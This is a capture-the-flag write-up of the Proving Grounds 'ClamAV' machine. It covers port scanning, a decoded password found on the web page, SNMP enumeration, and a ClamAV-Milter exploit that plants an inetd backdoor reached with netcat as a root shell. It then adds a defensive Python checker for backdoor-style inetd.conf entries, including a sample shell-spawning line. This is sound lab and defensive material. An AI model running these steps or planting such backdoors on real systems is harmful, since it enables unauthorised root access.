
Proving Grounds - ClamAV

ClamAV was an insightful box to explore exploitation techniques for services like ClamAV-Milter.

The process started with comprehensive information gathering, including a full port scan revealing various open ports.

The HTTP enumeration led to identifying and decoding a binary message, providing a potential password.

Enumeration of SNMP services helped identify the running ClamAV-Milter service.

The exploitation phase involved searching for relevant exploits and utilizing a Perl script to create a backdoor by modifying the /etc/inetd.conf file, which enabled root shell access through a netcat connection on a specified port.

Diagram

graph TD
    A[Information Gathering] -->|Port Scan| B[Enumeration]
    B --> C[HTTP 80]
    C --> |Find Binary Info| D[Decode Binary]
    B --> F[SNMP 199 & 25]
    F --> G[Identify ClamAV-Milter]
    G --> H[Exploit ClamAV-Milter] --> |Execute Perl Script| I[Root Shell]

Information Gathering

IP=192.168.184.42

Port scan

  • nmap -sS -Pn -n -T4 --open $IP
  • nmap -sS -Pn -n -T4 --open -p- $IP - the full-range scan turns up a new port, 6000
  • nmap -sVC -Pn -n -p 22,25,80,139,199,445,60000 $IP

Enumeration

HTTP 80

  • http://192.168.184.42/ → the page body is a message written in binary. The page title is Ph33r, which looks like a username.
  • Decoding the binary gives ifyoudontpwnmeuran00b, which looks like a password.
  • feroxbuster -u http://$IP -k -C 404,403,500,502 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .php -t 100

SNMP 199 & 25

  • snmpwalk -c public -v1 $IP - nothing useful
  • snmp-check $IP -c public

The snmp-check output shows it’s running ClamAV-Milter:

3782 runnable clamav-milter /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl

Exploitation

ClamAV

Searching for exploits for ClamAV-Milter:

  • searchsploit ClamAV-Milter - the only match is a Perl script
  • cat 4761.pl

This script exploits a vulnerability in Sendmail when used with ClamAV’s milter to append a malicious command to /etc/inetd.conf, creating a backdoor that serves a root shell on a specified TCP port (31337). The script then restarts the inetd service so the new entry takes effect.

  • perl 4761.pl $IP
  • nc $IP 31337 /bin/sh -i
  • flag
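A defender-side check to go with the backdoor described above, added here as an example and not taken from the writeup or the exploit script: it parses inetd.conf entries and flags any that hand a listening socket to a shell, use a raw port number as the service name, or run as root from outside the usual system paths. The exact line the script appends is not shown on the page, so the sample entry below is a constructed illustration of the pattern.

```python
"""Audit inetd.conf entries for backdoor-style services.

Added example, not from the original writeup. Parses the classic
inetd.conf format (service socket_type proto flags user program [args])
and reports entries that look like an appended shell backdoor.
The SAMPLE configuration is constructed for illustration.
"""
from typing import List, Tuple

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/ksh", "/usr/bin/perl", "/usr/bin/python"}
TRUSTED_DIRS = ("/usr/sbin/", "/usr/libexec/", "/usr/lib/")


def entry_reasons(fields: List[str]) -> List[str]:
    """Return why a parsed entry is suspicious (empty list if it looks normal)."""
    service, user, program, args = fields[0], fields[4], fields[5], fields[6:]
    out = []
    if program in SHELLS or any(a in SHELLS for a in args):
        out.append("spawns a shell or interpreter on the socket")
    if service.isdigit():
        out.append("service is a raw port number, not a name from /etc/services")
    if user == "root" and program != "internal" and not program.startswith(TRUSTED_DIRS):
        out.append("runs as root from a non-system path")
    return out


def find_suspicious(text: str) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for every suspicious entry in an inetd.conf text."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        fields = line.split()
        if len(fields) < 6 or line.startswith("#"):  # blank, comment or malformed
            continue
        reasons = entry_reasons(fields)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample: three ordinary entries plus one backdoor-style entry.
SAMPLE = """\
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
echo    stream  tcp  nowait  root  internal
31337   stream  tcp  nowait  root  /bin/sh  -i
"""

if __name__ == "__main__":
    for line, why in find_suspicious(SAMPLE):
        print(line, "->", "; ".join(why))
```

Run it against a copy of the real file with find_suspicious(open("/etc/inetd.conf").read()); on a host without inetd, an entry like the last one appearing at all is itself the finding.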

This post is licensed under CC BY 4.0 by the author.